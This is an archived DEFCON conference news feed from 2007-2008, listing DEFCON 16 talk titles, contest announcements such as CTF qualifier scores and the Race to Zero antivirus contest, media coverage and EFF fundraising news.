Panel: Internet Wars 2008 -- Gadi Evron (Moderator)
The Big Picture: Digital Cinema Technology and Security -- Mike Renlund
Inducing Momentary Faults Within Secure Smartcards / Microcontrollers -- Christopher Tarnovsky
MetaPost-Exploitation -- Valsmith, Colin Ames
Password Cracking on a Budget -- Matt Weir, Sudhir Aggarwal
New ideas for old practices - Port-Scanning improved -- Fabian "fabs" Yamaguchi, FX

==> DEFCON 16 Artwork Contest Extended!

https://www.defcon.org/defconrss.xml Due to late blooming interest in the contest, all entries for the DEFCON 16 Artwork Contest will be accepted up until 5pm PST on Sunday June 22, 2008. You can find the rules at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Voting for the People's Choice category will commence Monday June 23, 2008 and will run for one week on pics.defcon.org. A link to the voting gallery and instructions will follow at that time. You will need a DEFCON Pics account to vote, so if you don't have one, sign up now! Good luck all!

==> Defcon Goon: Speaker Operations: Call for Volunteers

https://www.defcon.org/defconrss.xml From Agent X on the DEFCON Forums: The few, the proud (arrogant?), the insane? Yes, that's right, Speaker Operations, a subset of the Defcon Goon Squad, is looking for a few good folks. Speaker Operations goons are the blue shirts that ferry speakers to and from stage, keep the speaking schedule in order, and generally try to make the talks not suck... Sometimes we succeed, sometimes we fail, generally there is beer at the end. In an effort to ensure a healthy supply of goons for future Defcons, I'm holding semi-formal auditions/interviews this year at Defcon 16. So if you're interested in joining the ranks of the Defcon Speaker Operations Goon squad, here's what you've got to do:
* Write me an email, telling me why you will rock speaker operations. (In a good way).
* Demonstrate your resourcefulness by tracking me down and arranging a time for us to talk at Defcon this year. Make it memorable... it's a busy con you know.
* Demonstrate to the speaker operations staff (those blue-shirted goons again, you know) why they are so awesome (?!Schwag, beer?!)
Thank you for your interest. Agent X https://forum.defcon.org/showthread.php?t=9474

==> Open CTF Registration is now Open!

https://www.defcon.org/defconrss.xml Formerly known as Amateur Capture The Flag (aCTF), this contest pits any Defcon attendee against the house (DC949) as well as other contestants. There is a series of challenges of varying difficulty involving a variety of things, including cryptology, steganography, malicious software, and websites (and other services) just waiting to be exploited. Find out more at: http://dc949.org/oCTFIV/

==> Movie Night with the Dark Tangent

https://www.defcon.org/defconrss.xml This year on Friday night we will be screening a documentary, Hackers Are People Too, which will end before the director/producer needs to participate in Hacker Jeopardy. Then we will move on to some Blu-Ray goodness of "Appleseed Ex-Machina" for the latest in CG anime from Japan. Saturday evening we will go retro with "Three Days of the Condor", where you can see an early Robert Redford deal with spies, telephones, and intrigue. For those who have seen "Safehouse", you'll recognize a scene-for-scene rip-off homage to "Condor". Then we'll close with an as-yet-TBD movie...

==> Qualifying CTF Teams for DEFCON 16

https://www.defcon.org/defconrss.xml The following teams have demonstrated their uber prowess by qualifying to participate in the DEFCON 16 Capture the Flag Contest, organized by Kenshoto. These 7 teams will be battling last year's winners, 1@stPlace, for the CTF title! DEFCON would like to congratulate all of these talented teams and wish them luck! Qualifying scores (total, then points per category):

Team                Total  Trivia  Binary Leetness  Forensics  Potent Pwnables  Real World
Routards            5200   1500    1000             1500       600              600
Pandas with Gambas  5200   1500    1000             1500       600              600
Guard@MyLan0        4800   1500    600              1500       600              600
Shellphish          4800   1500    600              1500       600              600
Taekwon-V           4800   1500    600              1500       600              600
WOWHACKER           4800   1500    600              1500       600              600
PLUS                4800   1500    600              1500       600              600

==> Mystery Challenge Registration Closing Soon!

https://www.defcon.org/defconrss.xml The LosT@Con Mystery Challenge preregistration will remain open for an undisclosed bit longer. Teams who have not completed the preregistration but that intend to enter are encouraged to post such intentions in the DC forums. This year there will be one wildcard slot open, and a mini-contest will be held two hours prior to the official contest start for that slot. https://forum.defcon.org/forumdisplay.php?f=369

==> Sign up for Hacker Jeopardy and Buzzword Survivor!

https://www.defcon.org/defconrss.xml Hacker Jeopardy The Official Hacker Jeopardy entry thread on the DEFCON Forums is now open for signup, at https://forum.defcon.org/showthread.php?t=9444 From the signup thread: This year, we will be accepting applications from both teams and individuals. We will likely hold a set of qualifying games Friday afternoon to allow unproven teams/people a chance to show off their skillz and advance into the late night tournament. Buzzword Survivor - NEW! Buzzword Survivor is a new contest that pits you against 36 hours of vendor pitches, with big cash prizes! Find out what it's all about and sign up at https://forum.defcon.org/forumdisplay.php?f=352

==> DEFCON 16 Artwork Contest Reminder

https://www.defcon.org/defconrss.xml There's only a little over a week left to submit your creations for the DEFCON 16 Artwork Contest. The Contest info and rules can be found at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Current submissions are on https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770

==> Another Round of DEFCON 16 Speakers are Live!

https://www.defcon.org/defconrss.xml We've got more talks up on the speaker page, listed below, alpha by speaker:
BackTrack Foo - From bug to 0day -- Mati Aharoni
They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention -- Jay Beale
Arbitrary code injecting MITM attack vectors -- Joachim De Zutter "byterage"
Wide World WAF's -- Ben Feinstein
Virtually Hacking -- John Fitzpatrick
Malware RCE: Debuggers and Decryptor Development -- Michael Ligh
Fear, Uncertainty and the Digital Armageddon -- Morgan Marquise-Boire
Toasterkit, a Modular NetBSD Rootkit -- Anthony Martinez, Thomas Bowen
Bringing Sexy Back: Breaking in with Style -- David Maynor, Robert Graham
Panel: All Your Sploits (and Servers) Are Belong To Us: Vulnerabilities Don't Matter (And Neither Does Your Security) -- David Mortman, Rich Mogull, Chris Hoff, Robert "RSnake" Hansen, Robert Graham, David Maynor
Solid State Drives Destroy Forensic & Data Recovery Jobs: Animated! -- Scott Moulton
Urban Exploration - A Hacker's View -- Phreakmonkey
Beholder: New wifi monitor tool -- Nelson Murilo, Luiz 'effffn' Eduardo
Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly -- Vic Vandal
RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife -- David Weston, Tiller Beauchamp
https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> Gringo Warrior at DEFCON 16 NEW!

https://www.defcon.org/defconrss.xml Participants in Gringo Warrior will have five minutes to free themselves from handcuffs, escape from their "cell", get past a guard, retrieve their passport from a locked filing cabinet, leave through another locked door, and make their escape to freedom. The course will offer a variety of locks representing a range of difficulty, allowing participation by people of all skill levels. Points will be awarded based on the time of completion as well as the difficulty of locks attempted. The best warrior of all wins the grand prize! Get the full story at: https://forum.defcon.org/showthread.php?t=9401

==> DEFCON 16 now has a Twitter Feed!

https://www.defcon.org/defconrss.xml DEFCON 16 Now has a Twitter Feed for all you Tweeters out there! Frequent updates will be forthcoming up to and during the con to keep you in the loop for news, contest updates and events. http://www.twitter.com/defcon16

==> DEFCON 16 CTF Quals Complete

https://www.defcon.org/defconrss.xml From Kenshoto.com: See the final results at http://www.kenshoto.com/results.txt! The first 7 teams on the list have qualified. If any are unable to attend, invitations will be extended to the alternates in scoring order.

==> DEFCON 16 Slogan Contest Now Open

https://www.defcon.org/defconrss.xml Do you think you have the wordsmithing skills to come up with the next great DEFCON slogan? The DEFCON 16 Slogan Contest is now up and running, so get on over to http://www.totallybog.us/dc16slogan/dc16slogan.html and submit your literary gems for a chance to be featured in the DEFCON 16 Program!

==> More DEFCON 16 Speakers Online!

https://www.defcon.org/defconrss.xml The following talks have been added, listed alpha by speaker:
Working with Law Enforcement -- Don M. Blumenthal
CSRF Bouncing -- Michael Brooks
Hacking Desire -- Ian Clark
Compromising Windows Based Internet Kiosks -- Paul Craig
Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key -- Thomas d'Otreppe de Bouvette "Mister_X", Rick Farina "Zero_Chaos"
Snort Plug-in Development: Teaching an Old Pig New Tricks -- Ben Feinstein
Playing with Web Application Firewalls -- Wendel Guglielmetti Henrique
Advanced Software Armoring and Polymorphic Kung Fu -- Nick Harbour
Under the iHood -- Cameron Hotchkies
Tuning Your Brain -- Lyn
Forensics is ONLY for Private Investigators -- Scott Moulton
Every Breath You Take -- Jim O'Leary
Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving, Or, Techniques of Industrial Espionage -- Eric Schmiedl
Gaming - The Next Overlooked Security Hole -- Ferdinand Schober
Making a Text Adventure Documentary -- Jason Scott
StegoFS -- James Shewmaker
Let's Sink the Phishermen's Boat! -- Teo Sze Siong, Hirosh Joseph
Medical Identity Theft -- Eric Smith, Dr. Shana Dardan
Web Privacy and Flash Local Shared Objects -- Clinton Wong

==> Beverage Cooling Contraption Contest on Hack A Day!

https://www.defcon.org/defconrss.xml The BCCC run by Deviant Ollam has popped up on hackaday.com! From the article: Let's face it: no one likes warm beer. In the arid August air of Las Vegas, though, it's difficult to get anything else. To combat this problem, Deviant has hosted a competition the last three years at Defcon called the Beverage Cooling Contraption Contest, or BCCC. We're not talking about something as simple as a Coleman cooler or even a peltier cooler: the devices entered in this contest have to be able to take a beer from hot to cool and into your glass within minutes. For info on the contest, go to: http://www.deviating.net/bccc

==> Round two of DEFCON 16 speaker selections!

https://www.defcon.org/defconrss.xml The selection process continues, and the second batch of talks for DEFCON 16 is now on the speaker page. They are listed below, alpha by speaker! Check 'em out!
Autoimmunity disorder in Wireless LAN -- Md Sohail Ahmad, JVR Murthy, Amit Vartak
The Anatomy of a Subway Hack: Breaking Crypto RFID's and Magstripes of Ticketing Systems -- Zack Anderson, RJ Ryan, Alessandro Chiesa
Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How -- Luciano Bello, Maximiliano Bertacchini
Buying Time - What is your Data Worth? (A generalized Solution to distributed Brute Force attacks) -- Adam Bregenzer
ModScan: A SCADA MODBUS Network Scanner -- Mark Bristow
Deciphering Captcha -- Michael Brooks
Hacking Data Retention: Small Sister your digital privacy self defense -- Brenno De Winter
Markets for Malware: A structural Economic Approach -- Brian K. Edwards, Silvio J. Flaim
Identification Card Security: Past, Present, Future -- Doug Farre
VLANs Layer 2 Attacks: Their Relevance and their Kryptonite -- Kevin Figueroa, Marco Figueroa, Anthony L. Williams
Journey to the center of the HP28 -- Travis Goodspeed
Nail the Coffin Shut, NTLM is Dead -- Kurt Grutzmacher
Race-2-Zero Unpacked -- Simon Howard
Triad-Based Music Steganography -- Adrian Johnson
Panel: Black vs. White: The complete life cycle of a real world breach -- David Kennedy, Ken Stasiak, Scott White, John Melvin, Andrew Weidenhamer
Demonstration of Hardware Trojans -- Fouad Kiamilev, Ryan Hoover
WhiteSpace: A Different Approach to JavaScript Obfuscation -- Kolisar
Flux on: EAS (Emergency Alert System) -- Matt "DCFLuX" Krick
Taking Back your Cellphone -- Alexander Lash
Feed my Sat Monkey -- Major Malfunction
Sniffing Cable Modems -- Guy Martin
The World of Pager Sniffing/Interception: More Activity than one may suspect -- NYCMIKE
New Tool for SQL Injection with DNS Exfiltration -- Robert Ricks
Free Anonymous Internet Using Modified Cable Modems -- Blake Self, Durandal
Evade IDS/IPS Systems using Geospatial Threat Detection -- Ryan Trost
The Death Envelope: A Medieval Solution to a 21st Century Problem -- Matt Yoder

==> First round of DEFCON 16 speakers selected!

https://www.defcon.org/defconrss.xml The first round of speakers has been selected for DEFCON 16, and it looks like we have a great lineup going! The selection process is coming along nicely and we should have the next batch of speakers online by the middle of next week. Here are the titles and speakers for the talks so far, alpha by speaker:
Time-Based Blind SQL Injection using heavy queries: A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool -- Chema Alonso, José Parada
VulnCatcher: Fun with Vtrace and Programmatic Debugging -- atlas
Owning the Users with Agent in the Middle -- Jay Beale
The emergence (and use) of Open Source Warfare -- Peter Berghammer
What To Do When Your Data Winds Up Where It Shouldn't -- Don Blumenthal
Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol -- Magnus Bråding
Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software) -- Jonathan Brossard
Building a Real Session Layer -- D.J. Capelis
Hacking E.S.P. -- Joe Cicero, Michael Vieau
Climbing Everest: An Insider's Look at one state's Voting Systems -- Sandy Clark "Mouse"
Could Googling Take Down a President, a Prime Minister, or an Average Citizen? -- Greg Conti
Next Generation Collaborative Reversing with Ida Pro and CollabREate -- Chris Eagle, Tim Vidas
Ask EFF: The Year in Digital Civil Liberties Panel -- Kevin Bankston, Eva Galperin, Jennifer Granick, Marcia Hofmann, Corynne McSherry, Kurt Opsahl
Panel: Hacking in the Name of Science -- Tadayoshi Kohno, Jon Callas, Alexei Czeskis, Dan Halperin, Karl Koscher
de-Tor-iorate Anonymity -- Nathan Evans, Christian Grothoff
Nmap: Scanning the Internet -- Fyodor
BSODomizer -- Joe "Kingpin" Grand, Zoz
Satan is on my Friends list: Attacking Social Networks -- Nathan Hamiel, Shawn Moyer
A Hacker Looks at 50 -- G. Mark Hardy
War Ballooning - Kismet Wireless "Eye in the Sky" -- Rick Hill
The Death of Cash: The loss of anonymity and other dangers of the cash free society -- Tony Howlett
Intercepting Mobile Phone/GSM Traffic -- David Hulton, "Skyper"
Ham For Hackers - Take Back the Airwaves -- JonM
Career Mythbusters: Separating Fact from Fiction in your Information Security Career -- Lee Kushner, Mike Murray
Developments in Cisco IOS Forensics -- "FX" Felix Lindner
Good Viruses. Evaluating the Risks -- Dr. Igor Muttik
Brain Games: Make your own Biofeedback Video Game -- Ne0nRain, Joe "Kingpin" Grand
VoIPER: Smashing the VoIP stack while you sleep -- N.N.P.
Hacking OpenVMS -- Christer Öberg, Claes Nyberg, James Tusini
365-Day: Active Https Cookie Hijacking -- Mike Perry
Malware Detection through Network Flow Analysis -- Bruce Potter
The true story of the Radioactive Boyscout: The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb -- Paul F. Renda
CAPTCHAs: Are they really hopeless? (Yes) -- Mike Spindel, Scott Torborg
Living in the RIA World -- Alex Stamos, David Thiel, Justine Osborne
Xploiting Google Gadgets: Gmalware and Beyond -- Tom "strace" Stracener, Robert "Rsnake" Hansen
TBA -- Marc Weber Tobias
How to make Friends & Influence Lock Manufacturers -- Schuyler Towne, Jon King
Compliance: The Enterprise Vulnerability Roadmap -- Weasel
Mobile Hacker Space -- Thomas Wilhelm
To read more about these talks, go to the speaker page at http://www.defcon.org/html/defcon-16/dc-16-speakers.html!

==> First Submissions in for DEFCON 16 Artwork Contest

https://www.defcon.org/defconrss.xml You can check out the first few submissions to the Artwork Contest on pics.defcon.org at this URL: https://pics.defcon.org/showgallery.php?cat=532

==> Call for Papers Closed/Speaker Selection has begun!

https://www.defcon.org/defconrss.xml The time has come to close the DEFCON 16 CFP. Speaker Selection is now underway, and updates to the Speaker list will be frequent as they are chosen. Keep your eyes on the speaker page, the schedule page, and subscribe to the RSS Feed to stay apprised of speaker announcements as they occur! Speaker Page: https://www.defcon.org/html/defcon-16/dc-16-speakers.html Schedule Page: https://www.defcon.org/html/defcon-16/dc-16-schedule.html RSS Feed: https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> DEFCON 16 CFP Open through the weekend!

https://www.defcon.org/defconrss.xml For all you last minute stragglers and super busy folks, we are keeping the Call for Papers open through Monday the 19th. Get on it and send that submission to talks at defcon dot org! https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html

==> Mystery Challenge Registration Challenge Open!

https://www.defcon.org/defconrss.xml LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at https://forum.defcon.org/showthread.php?t=9357. What is the Mystery Challenge, you may ask? From mysterychallenge.org: The mystery challenge is just that: a mystery. Details of the contest are not given until the contest starts. So take the dare, and enter a contest where you are flying blind. So you heard about the challenge, and think you can compete? Search for hints and clues carefully, even prior to Defcon. Suggested skillset for success:
- Physical security (lockpicking, literal hacking, etc.)
- Electronics (reading schematics, breadboard prototyping, etc.)
- Puzzle and riddle skills
- Coding, networking, hacking...
- ???

==> Call for Papers Closing Soon

https://www.defcon.org/defconrss.xml You've only got a few days left to submit your groundbreaking research to the DEFCON Call for Papers. Go to https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html and get your submission in for the chance to give a talk at DEFCON 16!

==> DEFCON 16 Capture the Flag Qualification Announcement

https://www.defcon.org/defconrss.xml Kenshoto will be back this year bringing all out cyber-warfare to DEFCON 16. The qualification round for this year's Capture the Flag contest has been officially announced. From the DEFCON Forums: Deputy Director of Homeland Security, Dr. Kenneth Shoto today announces a call to cyber-ninjas everywhere to sign up for his annual fight-to-the-death qualifying competition for the Defcon Capture the Flag (CtF) contest. The qualifying competition will start at 10PM on Friday, May 30th and end at 10PM on Sunday, June 1st. Find out more at https://forum.defcon.org/showthread.php?t=9352 or http://kenshoto.allyourboxarebelongto.us:1337/

==> Race to Zero and Dan Kaminsky on CBC Radio

https://www.defcon.org/defconrss.xml The buzz concerning the new unofficial Race to Zero Contest at DEFCON 16 just keeps on building. Dan Kaminsky provides his thoughts on the mounting controversy in an interview with Search Engine, a Canadian public radio program. Check it out here: http://podcast.cbc.ca/mp3/searchengine_20080508_5692.mp3

==> pics.defcon.org is Back!

https://www.defcon.org/defconrss.xml After a hiatus due to an XSS vulnerability, the DEFCON pics site is back up and running! Don't hesitate to head on over and upload your favorite photos and videos from past DEFCON conventions!

==> Race to Zero Makes Headlines

https://www.defcon.org/defconrss.xml The Race-to-Zero anti-virus challenge was announced scarcely a week ago, and already the controversy surrounding it has bubbled all the way up to Wired. The contest's basic premise is that competitors will be given sample virus code and rewarded for modifying that code in such a way that it defeats common AV products. AV vendors have made their discomfort with the idea clear, with various spokesmen for the industry voicing concern about the creation of new threats to existing AV products. Contest organizers have countered that the contest is categorically not about creating new viruses; rather, it is about demonstrating the speed with which currently blocked viruses can be modified to defeat current virus-blocking software. It's important to note that while the contest will be happening at this year's DEFCON, it is not an official DEFCON contest. To learn about the contest from its creators and organizers, please check their website at www.racetozero.net.
Links:
http://www.racetozero.net/
http://blog.wired.com/27bstroke6/2008/04/hacker-challenge.html
http://www.infoworld.com/article/08/04/28/Security-vendors-slam-Defcon-virus-contest_1.html
Go to https://forum.defcon.org/forumdisplay.php?f=419 to chime in on the controversy.

==> DEFCON 16 Artwork Contest Call for Submissions

https://www.defcon.org/defconrss.xml Whip out your favorite medium and get to creating, because the official DEFCON 16 Art Contest is now underway! This year's contest is a bit different from previous years, and will run from now until June 15, 2008. Go to http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

==> New Contest! The Race to Zero

https://www.defcon.org/defconrss.xml Check out this new contest brewing for DEFCON 16! From the DEFCON Forums: The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/

==> DEFCON 16 Black & White Ball Call for Talent

https://www.defcon.org/defconrss.xml This is the official CALL FOR TALENT: This year the ballroom will lead a double life. By day, the room will be a chillout/breakout room complete with wifi. By night, the room will transform into the Black and White Ball, complete with dance floor, lights, headlining acts and a bar. That said, we are currently taking all submissions for DJs/acts for the chillout/breakout room, and have a few slots for the Black and White Ball. Some of the styles we are looking for are: drum n bass, trance, breaks, electro, industrial. If you are interested in performing, please contact: blackandwhitedjs@gmail.com

==> DEFCON 16 Call for Papers Now Open!

https://www.defcon.org/defconrss.xml That's right! It's time again to submit your hacktastic discoveries to be considered as a DEFCON 16 talk! New and interesting research is always welcomed in the realm of security, hardware hacking, social engineering, lockpicking, and anything else you can modify, bypass or reverse engineer. Out of the box thinking is what we're after... Go to the CFP form and submit!

==> DEFCON 15 [Video] Podcast now online.

https://www.defcon.org/defconrss.xml The Defcon 15 Video Podcast is now online. If you didn't make it, or missed the speaker you wanted to see, here is your chance to download and watch the presentations any time. http://www.defcon.org/podcast/defcon-15-video.rss Supporting materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> DEFCON 15 [Audio] Podcast now online

https://www.defcon.org/defconrss.xml The Defcon 15 Audio Podcast is now online. If you didn't make it, or missed the speaker you wanted to see, here is your chance to download and hear the presentations when you want. http://www.defcon.org/podcast/defcon-15-audio.rss Supporting materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> Tiger Team with Pyr0, long time DEF CON Goon(tm)

https://www.defcon.org/defconrss.xml Tiger Team is a new series on TruTV (formerly CourtTV) featuring a familiar face from DEFCON, Luke McOmie aka pyr0. From Wikipedia: The show follows a "tiger team" of Chris Nickerson, Luke McOmie, and Ryan Jones, which is hired to infiltrate organizations with the objective of testing their weaknesses to electronic, psychological, tactical, and physical threats. Attacks executed on organizations in this television show include social engineering, wired and wireless hacking, and physically breaking into buildings. The television show's first two episodes aired Tuesday, December 25, 2007 at 11:00 pm ET and 11:30 pm ET. The first episode is available on TruTV's website in streaming Flash format. TruTV Feedback: http://www.trutv.com/contact/feedbackform.asp?subject_id=148&start=true

==> Join the DEFCON LinkedIn Group

https://www.defcon.org/defconrss.xml Join the DEFCON LinkedIn Group! We have created a DEF CON group on LinkedIn; if you already have an account at LinkedIn, please join us. We don't collect email addresses, so there is no easy way to pre-approve people; just use the following link to request membership. http://www.linkedin.com/e/gis/47798/109B061719DC

==> Pre-DEFCON 16

https://www.defcon.org/defconrss.xml It's beginning already... Check out the Pre-DEFCON 16 Discussions in the DEFCON Forums. If you want to get involved, start here!

==> DT Speaks Out On the "To Catch a Hacker" Scandal

https://www.defcon.org/defconrss.xml The media storm that followed the NBC producer fleeing DEFCON included a lot of opinions, but none of them came from the DEFCON staff itself. DT recently contributed a piece to the Thinkernet blog at InternetEvolution.com. It's an interesting piece about the significance of the event and some of the lessons that the media can take from all the hoopla.

==> DEFCON FORUMS now support user blogs

https://www.defcon.org/defconrss.xml The DEFCON forums (forum.defcon.org) now support projects and blogs. We have licensed the vBulletin blog tool (http://www.vbulletin.com/features_blog.php), and anyone with a forum account can now create a blog. We'll be doing more with this in the future, but for now we are encouraging people to create accounts and play with it. If it works we'll keep it; if not, we'll look for other software to try. We've also licensed Project Tools (http://www.vbulletin.com/features_project.php) that everyone can use to plan DC Groups projects, events at the con, or their latest hacking project. If you're a forum member, we hope you'll take a little time to try out the new features. If you're not, here's hoping this helps you decide to join us.

==> DEFCON 15 Badge finalist in Design Challenge

https://www.defcon.org/defconrss.xml The Defcon 15 badge is a finalist in the Freescale Semiconductor Black Widow $10,000 Design Challenge. Freescale selected the ten finalists from a field of more than 775 participants. Each submission was judged on creativity, design efficiency, technical complexity, number of Freescale devices used, and overall application innovation and usefulness.

==> Photos of DC 15 Badge Hacks

https://www.defcon.org/defconrss.xml Check out these photos of the badge hacking and final hacks at DEFCON 15. For badge source code, video of the hacks, and source of selected hacks, check out Joe Grand's badge page at: http://www.grandideastudio.com/portfolio/index.php?id=1&prod=54

==> DEFCON Network Survival Guide

https://www.defcon.org/defconrss.xml It's a little late, but it's never too early to start planning for next year. If you must get online at DEFCON, here's a little guide to help keep you from getting completely owned. From The Register: "..Defcon, the most bacchanal of security conferences and perhaps the single largest gathering of technically adept pranksters. Now is the perfect time to map out a strategy for keeping emails private and making sure your system doesn't get ransacked by the scowling kid with the nose ring and jet-black hair."

==> The Traveling Terabyte Project

https://www.defcon.org/defconrss.xml Many of you know Deviant Ollam from his extensive involvement in the Lockpick Village and his running of the Beverage Cooling Contest, as well as his new "Titanium Chef" and "Guess the Flesh" contests at the Toxic BBQ this year. We came across a story about one of his projects and thought we'd share. From tgdaily.com: A New Jersey network engineer is on a mission to send some love and care of the digital kind to Americans stationed overseas. Going by his hacker handle Deviant Ollam, he's been sending out hard drives filled with popular movies, television shows and music for over a year. Dubbed the Traveling Terabyte Project (TTB), the drives have seen action in war-torn countries and one set is now making a small contingent of Marines very happy in the former Soviet republic of Tajikistan. Photos at: http://www.tgdaily.com/index.php?option=com_content&task=blogsection&id=18&Itemid=41&slideshow=20070920

==> Kingpin: far from soft, reprezentin' l0pht.

https://www.defcon.org/defconrss.xml This little slice of gangsta was part of the winning Badge Hacking Contest submission by Team Osogato. This rap song was created by The Brothers Grimm and based on Kingpin's "Ode to the DEFCON 15 Badge" poem printed in the conference program. It was played at the DEFCON 15 Awards Ceremony on Sunday afternoon. Thanks to Kingpin for posting this on the media server at pics.defcon.org. If you've got any pictures or media from DEFCON, please consider sharing them with the DC family at pics.defcon.org.

==> DEFCONbot video

https://www.defcon.org/defconrss.xml Ever wonder what it takes to compete in the DEFCONbot shootout? Check out some fascinating behind-the-scenes video from a team that had a sentry gun in this year's competition at the Burnt Popcorn blog. For more information about DC 15's DEFCONbots winners or data on past competitions, be sure to visit defconbots.org.

==> Call for DEFCON 15 photos

https://www.defcon.org/defconrss.xml If you have pictures of DEFCON 15 (or any previous DEFCON) you'd like to share, please upload them to https://pics.defcon.org. We're trying to create a visual record of all the shows and your help is appreciated. Just create an account and start uploading pictures and videos!

==> DEFCON media archives updated

https://www.defcon.org/defconrss.xml The DEFCON media archives have been updated with slides, white papers and extras for DEFCON 15 presentations. Come check them out, and stay tuned - we'll be adding audio and video from DEFCON 15 as soon as it's ready.

==> DEFCON In The News

https://www.defcon.org/defconrss.xml Many interesting things happened at this year's DEFCON, from the sensational hackable badge by Joe Grand to the eye-opening talk by Zac Franken on access control reader (in)security. We blew the undercover reporter's cover, and we found out that a kid can bump a "bump-proof" deadbolt. We even married two Feds. What a year! Here are just a few of the headlines arising from DEFCON 15:
http://www.wired.com/politics/security/news/2007/08/medeco Medeco Readies Assembly-Line Fix for DefCon Lock Hack
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9029080 $10 hack can unlock nearly any office door
http://blog.wired.com/27bstroke6/2007/08/i-married-a-fed.html I Married a Fed at DefCon
http://www.youtube.com/watch?v=nCvmkxO5hoQ Michelle Madigan Video: Dateline Reporter Uncovered At DEFCON 2007
http://weblog.infoworld.com/zeroday/archives/2007/08/defcon_diary_th.html Defcon diary: The real story

==> A Word from DEFCON 15 Badge Creator Joe Grand!

https://www.defcon.org/defconrss.xml Joe decided to drop us a line and send us some info on what's going on with the badges AFTER the con. We loved the badges this year and apparently we aren't the only ones who found them awesome. From Joe Grand: "You've probably noticed that people are still going *nuts* over the badges. That's a really awesome feeling and hopefully there will be some of the 40 people who took components and development kits coming back next year with some radical hacks. Here are some pictures I took of the Black Hat and DEFCON conferences (and badge hacking): http://www.flickr.com/photos/joesmooth/sets/72157601295119952/ and here: http://www.flickr.com/photos/joesmooth/sets/72157601302838516/ The badges have been selling like hot cakes on eBay: http://search.ebay.com/defcon-15 Take a look at the completed listings, too, to see the high bidders! Also, there were TONS of blog and news reports about the badge. You've probably read most of them, but here are the ones I liked the best:
* Hack-a-Day, August 2, 2007, http://www.hackaday.com/2007/08/02/the-defcon-badge
* The Register, The romance and mystery of a good hack, August 6, 2007, http://www.theregister.co.uk/2007/08/06/defcon_final/
* The Inquirer, Defcon ID badge comes with its own technical manual, August 3, 2007, http://www.theinquirer.net/default.aspx?article=41436
* boingboing, Defcon's hackable badges, August 3, 2007, http://www.boingboing.net/2007/08/03/defcons_hackable_bad.html
* Wired, Threat Level, Badge Hack at DefCon, August 3, 2007, http://blog.wired.com/27bstroke6/2007/08/badge-hack-at-d.html
* Makezine.com: Defcon 15 round up, August 5, 2007, http://www.makezine.com/blog/archive/2007/08/defcon_15_round_up.html
* Makezine.com: Hackers on a Plane - Defcon, August 7, 2007, http://www.makezine.com/blog/archive/2007/08/hackers_on_a_plane_defcon_1.html
* Gizmodo, DefCon Badge Hacked in 10 Minutes, August 3, 2007, http://gizmodo.com/gadgets/defcon/defcon-badge-hacked-in-10-minutes-285998.php
I'll be putting up a webpage with complete badge development info, badge hacking contest results/hacks/source, etc. in the next week or so. It will be directly accessible from the main www.grandideastudio.com site for a while. Details on the winning badge hacking contest entry from Team Osogato can be found here: http://www.osogato.com/hacks This was the only entry out of seven that combined hardware and firmware modifications - they hacked the badge into a line-level meter for under $10 that used the LED matrix to display the peak audio levels of an audio signal fed into one channel of the A/D. The two capacitive touch buttons are used to adjust the input levels of the signal and there are even three shades of "greyscale" for a fading effect on the LEDs. For the icing on the cake, the team worked with The Brothers Grimm from Michigan (http://www.myspace.com/CompleteError) to create a rap song based on my poem that I wrote for the DC15 program (on page 3). What an honor! The song is freely available at the Team Osogato link above and step-by-step hack details are forthcoming. Hope you guys are recovering! Joe"

==> DEFCON 15 Supports EFF! Dunk Tank Results!

https://www.defcon.org/defconrss.xml This year the Dunk Tank raised $4,700. We matched that and added our contribution to reach a total of $12,000 for the EFF! We know they will put it to good use with their hard work! For the past 17 years, EFF has been proud to take on the hard cases to ensure that your liberty is not sacrificed unnecessarily. They are responsible for loads of support for Tor, stopping RIAA lawsuits, privacy issues, etc. You don't have to wait till the next Dunk Tank at DEFCON 16 to support them! Join EFF today! They work all year round, so support them by donating to EFF at http://secure.eff.org/. Spread the word to your friends and family. Short goal list of current EFF projects:
* Pull Congress Back Into the Wiretapping Fight!
* Repeal the REAL ID Act!
* Reform the PATRIOT Act!
* Support the FAIR USE Act!
* Fight the Justice Department's Copycrime
* Stop the SPY Act!
* Stop the Broadcasting Treaty Flip-Flop!
* CA Alert - Keep RFIDs out of State IDs!
* Don't Let Congress Shackle Digital Music!
* Tell Congress to Support E-Voting Reform! Make sure every vote counts!
* Improve the Freedom of Information Act!
* Don't Let Cable Companies Ratchet Up Restrictions!

==> theSummit at DEF CON 15

https://www.defcon.org/defconrss.xml Want to help support the EFF and the Hacker Foundation? Would you like to meet the authors of those security books you have been reading all year long? Craving some live nerdcore? Kill three birds with one stone! Thursday, August 2, 2007 @ 9:00PM, Vegas 2.0 presents "theSummit", a fundraiser with a twist! Meet with computer security gurus, listen to some great live music AND support two great causes at the same time! Meet up with us in the Riv Skyboxes this Thursday; tickets are $35 at the door. Need more details? Visit http://www.vegassummit.org

==> DEFCON 15 FINAL Schedule now on-line!

